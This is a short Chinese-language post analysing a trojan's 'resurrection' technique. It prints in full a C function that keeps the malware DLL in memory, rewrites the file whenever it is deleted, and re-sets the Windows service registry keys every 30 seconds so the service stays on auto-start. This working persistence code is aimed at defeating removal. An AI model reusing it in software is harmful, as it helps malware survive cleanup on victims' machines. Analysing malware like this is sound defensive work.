解析木马复活技术-程序被删还会还原

我在无聊之中看到一款源码，下来看以后发现程序会创建一个ShieldThread线程

跟踪下去发现它会把自身读取到一个分配的内存空间，然后每个一段时间判断自身文件是否存在

如果不存在就从内存中写出文件。具体代码如下

//

DWORD WINAPI ShieldThread(LPVOID lpParamter)
{
 char   DllFilePath[MAX_PATH];
 HANDLE hDllFile;
 HANDLE hSearch;
 void*  MemDll;
 int    SizeDll;
    DWORD  BytesRead;
 WIN32_FIND_DATA  FileData;
    char   ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
    char * SubRoot="SYSTEM\\CurrentControlSet\\Services\\";
   
 __try
 { 
  ShieldFlag = 1;
  strncpy(ProtectKey1,SubRoot,sizeof(ProtectKey1));
     strncat(ProtectKey1,ServerCFG.ServiceName,sizeof(ProtectKey1)); 
     strncpy(ProtectKey2,ProtectKey1,sizeof(ProtectKey2));
     strncat(ProtectKey2,"\\Parameters",sizeof(ProtectKey2));
     GetModuleFileName(HMODULE(hDll), DllFilePath,MAX_PATH);

     hDllFile =CreateFile(DllFilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
     SizeDll  =GetFileSize(hDllFile,0);
     MemDll   =VirtualAlloc(0,SizeDll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
        ReadFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
     CloseHandle(hDllFile);
   
     while(1)
  {
    
   hSearch =FindFirstFile(DllFilePath,&FileData);
         if(hSearch==INVALID_HANDLE_VALUE)
   {         
    hDllFile=CreateFile(DllFilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                WriteFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
          CloseHandle(hDllFile);
   } 
   FindClose(hSearch);
         WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey1,"Start",REG_DWORD,NULL,2,1);
      WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey2,"ServiceDll",REG_EXPAND_SZ,DllFilePath,NULL,0);
      Sleep(30000);
  }
 }
 __finally
 {
  CloseHandle(hDllFile);
  FindClose(hSearch);
 }
 return 0;
}